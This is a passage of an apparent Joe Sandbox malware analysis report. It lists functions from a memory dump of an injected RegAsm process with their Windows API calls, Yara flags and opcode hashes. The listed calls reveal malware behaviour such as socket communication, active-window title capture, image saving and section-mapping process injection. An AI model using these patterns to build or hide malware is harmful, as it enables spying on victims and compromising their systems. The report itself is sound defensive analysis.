                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap$_free
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1482568997-0
                                                                                                                                  • Opcode ID: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                                                                  • Instruction ID: 528349031ecf72c594af6ac828cc426c74ce8c7b4bfa82022820746e0f177899
                                                                                                                                  • Opcode Fuzzy Hash: b157f1fc507fc560bd00b565224a750c722b28025775eaa04a87fd2772ac9c2e
                                                                                                                                  • Instruction Fuzzy Hash: 4CF0283110121176BB213B266C01B6B3759AF83B70B1700ABFC1466281CFBCCC41406F
                                                                                                                                  Function 0040482D Relevance: 3.0, APIs: 2, Instructions: 40networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • socket.WS2_32(00000002,00000001,00000006), ref: 00404852
                                                                                                                                  • CreateEventW.KERNEL32(00000000,00000000,00000001,00000000,?,0040530B,?,?,00000000,00000000,?,?,00000000,00405208,?,00000000), ref: 0040488E
                                                                                                                                    • Part of subcall function 0040489E: WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateEventStartupsocket
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1953588214-0
                                                                                                                                  • Opcode ID: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                  • Instruction ID: ed99eca956a2b7a9b5891d615cc725ddac26720bb1770143763ad27df005c20f
                                                                                                                                  • Opcode Fuzzy Hash: 1e452a305f2f2717745e8e1604374189d9659e6cad2ea1bb393ee33250cb33e3
                                                                                                                                  • Instruction Fuzzy Hash: 760171B1408B809ED7359F38A8456877FE0AB55304F048D6EF1DA97B91D3B5A881CB18
                                                                                                                                  Function 0040165E Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                  • Instruction ID: 1e9d0a06bdb6e9f7b23a96960dfc4b712b0be9606a3b942e14a6d4fe6a34620f
                                                                                                                                  • Opcode Fuzzy Hash: e70bc1220f3c0aaa69c113e67994fb024de36f7e04ed45e289cd83dd41bab85d
                                                                                                                                  • Instruction Fuzzy Hash: EBF0E2706042016BCB0C8B34CD50B2A37954B84325F248F7FF02BD61E0C73EC8918A0D
                                                                                                                                  Function 10001EEC Relevance: 3.0, APIs: 2, Instructions: 32COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • dllmain_crt_process_attach.LIBCMT ref: 10001F22
                                                                                                                                  • dllmain_crt_process_detach.LIBCMT ref: 10001F35
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: dllmain_crt_process_attachdllmain_crt_process_detach
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3750050125-0
                                                                                                                                  • Opcode ID: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                  • Instruction ID: 876e10da87b92cf64c449b9c471687dd08192407587f6dd1e67cbf7e6a41b987
                                                                                                                                  • Opcode Fuzzy Hash: a083a93b774f70b3c38eb0fc97558fdcbb4f7ca7475fb23d15f98f17c44c9911
                                                                                                                                  • Instruction Fuzzy Hash: A0E0D83646820BEAFB11EEB498156FD37D8EB011C1F100536B851C115ECB39EB90F121
                                                                                                                                  Function 0041BB27 Relevance: 3.0, APIs: 2, Instructions: 26COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GetForegroundWindow.USER32 ref: 0041BB49
                                                                                                                                  • GetWindowTextW.USER32(00000000,?,00000100), ref: 0041BB5C
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Window$ForegroundText
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 29597999-0
                                                                                                                                  • Opcode ID: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                  • Instruction ID: 8c7c0eb369f00208a7459315ff6bb8442305c4ed6b2016914032ba092e23deac
                                                                                                                                  • Opcode Fuzzy Hash: 2784d0b2db336add8319ad638143428ee57387129fbd6e48793ce9af45086994
                                                                                                                                  • Instruction Fuzzy Hash: 21E04875A00328A7E720A7A5AC4EFD5776C9708755F0001AEBA1CD61C2EDB4AD448BE5
                                                                                                                                  Function 0043A46C Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00438E14: try_get_function.LIBVCRUNTIME ref: 00438E29
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 0043A48A
                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 0043A495
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                  • Opcode ID: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                  • Instruction ID: eb5cae5cbee30b1ad319c652a9e61f9a188d1dba44d7e0681113cf8ff6ee03f7
                                                                                                                                  • Opcode Fuzzy Hash: 7c89d40c7eedfd0dbade414ce873565ce9a5339007f2f4ce9f715b5c80c9974a
                                                                                                                                  • Instruction Fuzzy Hash: 34D0A725584340141C04A279381B19A1348193A778F70725FF5A0C51D2EEDD4070512F
                                                                                                                                  Function 100038E8 Relevance: 3.0, APIs: 2, Instructions: 19COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 10003AF1: try_get_function.LIBVCRUNTIME ref: 10003B06
                                                                                                                                  • ___vcrt_FlsSetValue.LIBVCRUNTIME ref: 10003906
                                                                                                                                  • ___vcrt_uninitialize_ptd.LIBVCRUNTIME ref: 10003911
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.920353796.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.920348667.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.920353796.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_10000000_RegAsm.jbxd
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Value___vcrt____vcrt_uninitialize_ptdtry_get_function
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 806969131-0
                                                                                                                                  • Opcode ID: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                  • Instruction ID: 7b09b9f0a56a55c342e0a0cde292dff0536b901afa775ab746cb2a45ce2dbbc5
                                                                                                                                  • Opcode Fuzzy Hash: 85dde84de96db858e9ac955eb0900af54eb95c15fda99a7601862167fd99e8cb
                                                                                                                                  • Instruction Fuzzy Hash: 50D0223A8087431CF80BC6BD2C67A8B23CCCB421F4360C2A6F7209A0CDEF60E0046322
                                                                                                                                  Function 004185A3 Relevance: 2.5, APIs: 2, Instructions: 18COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwCreateSection,00000000,00000000), ref: 00418171
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418174
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwMapViewOfSection), ref: 00418185
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 00418188
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwUnmapViewOfSection), ref: 00418199
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 0041819C
                                                                                                                                    • Part of subcall function 0041812A: GetModuleHandleA.KERNEL32(ntdll,ZwClose), ref: 004181AD
                                                                                                                                    • Part of subcall function 0041812A: GetProcAddress.KERNEL32(00000000), ref: 004181B0
                                                                                                                                    • Part of subcall function 0041812A: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000004,00000000,00000000,?,?), ref: 00418252
                                                                                                                                    • Part of subcall function 0041812A: VirtualAlloc.KERNEL32(00000000,00000004,00001000,00000004), ref: 0041826A
                                                                                                                                  • CloseHandle.KERNEL32(004040F5), ref: 004185B9
                                                                                                                                  • CloseHandle.KERNEL32(00465E84), ref: 004185C2
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Handle$AddressModuleProc$Close$AllocCreateProcessVirtual
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2948481953-0
                                                                                                                                  • Opcode ID: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                  • Instruction ID: c73268819cb60d4ae5e82c4b87b0b0ed6d20300d6cd2269ac6e8254bb02e1260
                                                                                                                                  • Opcode Fuzzy Hash: 434d97dd539276bb1b15e641649fa57fd1217911ab9ffb100551eca57c0074db
                                                                                                                                  • Instruction Fuzzy Hash: 4FD05E76C4120CFFCB006BA4AC0E8AEB77CFB09211B50116AEC2442252AA369D188A64
                                                                                                                                  Function 004118ED Relevance: 1.6, APIs: 1, Instructions: 64COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID:
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID:
                                                                                                                                  • Opcode ID: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                  • Instruction ID: 3af98ca860494c99acd04ebe2bb4cc6dc665ec8dea8eb108ba88c8789d347e54
                                                                                                                                  • Opcode Fuzzy Hash: 3a029944d771eb8a1b2846a7b5ac2838134afd3be6a211902ab956b72bc11154
                                                                                                                                  • Instruction Fuzzy Hash: 9411E3B27201019FD7149B18C860BA6B766FF50710F5942AAE256CB3B2DB35EC91CA98
                                                                                                                                  Function 0043AA9B Relevance: 1.5, APIs: 1, Instructions: 48COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: __alldvrm
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 65215352-0
                                                                                                                                  • Opcode ID: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                  • Instruction ID: 3aa9a871bb282a4e2fa9f206226bba5a96c76ae51e783e445703a1682bb04715
                                                                                                                                  • Opcode Fuzzy Hash: 0fb042ee673182d0a975c8eeaa188f9506240d203db94b7081741dab0a726564
                                                                                                                                  • Instruction Fuzzy Hash: 51014CB2950308BFDB24EF64C902B6EBBECEB04328F10452FE445D7201C278AD40C75A
                                                                                                                                  Function 004461B8 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AllocateHeap
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1279760036-0
                                                                                                                                  • Opcode ID: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                  • Instruction ID: 139fbca062bb8bf671a891d82c3cf8fc988f9ce198a1a8b78c24da0334343556
                                                                                                                                  • Opcode Fuzzy Hash: 9dc7fa543976cc1aa64452a14dec52ea5ded8d4e1ebcbf177ce858167d1c4c1d
                                                                                                                                  • Instruction Fuzzy Hash: CEE0E531A0021267F6312A269C01B5B76599B437A0F170137AD15922D2CE6CCD0181EF
                                                                                                                                  Function 0040489E Relevance: 1.5, APIs: 1, Instructions: 15networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • WSAStartup.WS2_32(00000202,00000000), ref: 004048B3
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Startup
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 724789610-0
                                                                                                                                  • Opcode ID: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                  • Instruction ID: 97c3e6bab4f4407137ad71e204409d8be70fba83985c90e8682379c152a4c00d
                                                                                                                                  • Opcode Fuzzy Hash: e47b679f8b5f7a60eca2a032b66c8256c268ab46ab34190103e4171c6a1e128b
                                                                                                                                  • Instruction Fuzzy Hash: 92D0123255C70C8EE620ABB4AD0F8A4775CC317616F0007BA6CB5836D3E6405B1DC2AB
                                                                                                                                  Function 00418691 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GdipLoadImageFromStream.GDIPLUS(?,?,?,00418B0C,00000000,?,?,?,?,00000000), ref: 004186A5
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FromGdipImageLoadStream
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3292405956-0
                                                                                                                                  • Opcode ID: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                                                                                                                                  • Instruction ID: 43760c1b0819a338a5deeaaf53a1808d78fb0d0861515ad37458d280f23f523c
                                                                                                                                  • Opcode Fuzzy Hash: 622fa0b139d9c8e49d1b860aa3f0d2c71aabae9c10a97b9ae04fddd858742a73
                                                                                                                                  • Instruction Fuzzy Hash: B0D0C9B6514310AFC3619F04DC40AA2B7E8EB15312F11C82BA8D5C2620D7749C488B54
                                                                                                                                  Function 00418706 Relevance: 1.5, APIs: 1, Instructions: 12COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GdipSaveImageToStream.GDIPLUS(?,?,?,?,00000000,00418B62,00000000,?,?), ref: 00418718
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: GdipImageSaveStream
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 971487142-0
                                                                                                                                  • Opcode ID: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                                                                                                                                  • Instruction ID: 4096a07c3c24ce64e1baa665156051a68d3341f73ff607d033811f23ed9a4a9b
                                                                                                                                  • Opcode Fuzzy Hash: 2b14b1dce46a2bfe4ee8223d47c11625fbcfce4f614b1a3c8f6551cdff2dc83b
                                                                                                                                  • Instruction Fuzzy Hash: 12C0C932008351AB8B529F449C05C5FBAA6BB98211B044C1EF15541120CB258C659B5A
                                                                                                                                  Function 00404BE5 Relevance: 1.5, APIs: 1, Instructions: 11threadCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • CreateThread.KERNEL32(00000000,00000000,Function_00004C01,004758E8,00000000,00000000), ref: 00404BF8
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: CreateThread
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2422867632-0
                                                                                                                                  • Opcode ID: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                                                                                                                                  • Instruction ID: 9d5c7c84f515cf35c3e932a45e486dbb5327be38257a8aa591cdad7e466f248e
                                                                                                                                  • Opcode Fuzzy Hash: 93ba778880e199ddb191fa863179a72969e2b1c83519dbb18fcdc4b7e209d100
                                                                                                                                  • Instruction Fuzzy Hash: 22C04CF1515200BFBA00CB60CD89C37B69DD750701715C8697908D2141D576DC01D538
                                                                                                                                  Function 004027A7 Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • std::_Deallocate.LIBCONCRT ref: 00402E2B
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Deallocatestd::_
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1323251999-0
                                                                                                                                  • Opcode ID: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                  • Instruction ID: a1ed0c2070530d0d1545540182683da5b3cb4a6c90a46b83737b9b29f97d9faa
                                                                                                                                  • Opcode Fuzzy Hash: 1728ba59e3f5797c2b26d6c1ec3f14ce13f4925b5309dcbb8e7c7e422a6d3f49
                                                                                                                                  • Instruction Fuzzy Hash: FFB092364442007ACA026640AC86F5EB762ABA4710F14C92ABA9A281E2D6B74268A647
                                                                                                                                  Function 00426D42 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: recv
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1507349165-0
                                                                                                                                  • Opcode ID: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                  • Instruction ID: c63eaffdb417a6470c671315a396a42075a312041b5b8b5670d44767818a4bbd
                                                                                                                                  • Opcode Fuzzy Hash: f4db5bd4806bc66e377c48788e3214861744c877e7cd4eb35e6567da0e63c1ec
                                                                                                                                  • Instruction Fuzzy Hash: 26B09279108202FFCA150B60CC0886ABEA6ABC8382B00882DB586411B0C736C851AB26
                                                                                                                                  Function 00426D59 Relevance: 1.5, APIs: 1, Instructions: 7networkCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: send
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2809346765-0
                                                                                                                                  • Opcode ID: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                  • Instruction ID: 21703143275c54c82102de5c78eddca0fb0a16d203a0de67c7bd570fb3111ac2
                                                                                                                                  • Opcode Fuzzy Hash: b9ca0b0eaa02557cb4d56b342a6254bf92ad90fc72112118e0a601f448bbd0ca
                                                                                                                                  • Instruction Fuzzy Hash: 87B09B75108301FFD6150760CC0486A7D6597C8341F00491C718741170C635C8515725
                                                                                                                                  Function 004186B4 Relevance: 1.5, APIs: 1, Instructions: 4COMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • GdipDisposeImage.GDIPLUS(?,00418BBD), ref: 004186BD
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  • Associated: 0000000D.00000002.919883985.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                  Joe Sandbox IDA Plugin
                                                                                                                                  • Snapshot File: hcaresult_13_2_400000_RegAsm.jbxd
                                                                                                                                  Yara matches
                                                                                                                                  Similarity
                                                                                                                                  • API ID: DisposeGdipImage
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 1024088383-0
                                                                                                                                  • Opcode ID: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                                                                                                                                  • Instruction ID: d9118485f6a3d23189d012adfd41c145ee3959ede018d2d91b25300b670f9ca3
                                                                                                                                  • Opcode Fuzzy Hash: 0ec9bc49c4904e7bb4143567628e623777d6e2ea47272714c4fc696535c6f937
                                                                                                                                  • Instruction Fuzzy Hash: E1A001B4815601DF8F025F609A48A647FA5AB4630A3248199D4898A222D77BC857DE6A
                                                                                                                                  Function 00411CDE Relevance: 1.3, APIs: 1, Instructions: 6memoryCOMMON
                                                                                                                                  Download Yara Rule
                                                                                                                                  APIs
                                                                                                                                  • VirtualAlloc.KERNEL32(00000040,00000040,00000040,00000040,00411E22,?,00000000,00003000,00000040,00000000,?,?), ref: 00411CEE
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 0000000D.00000002.919883985.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
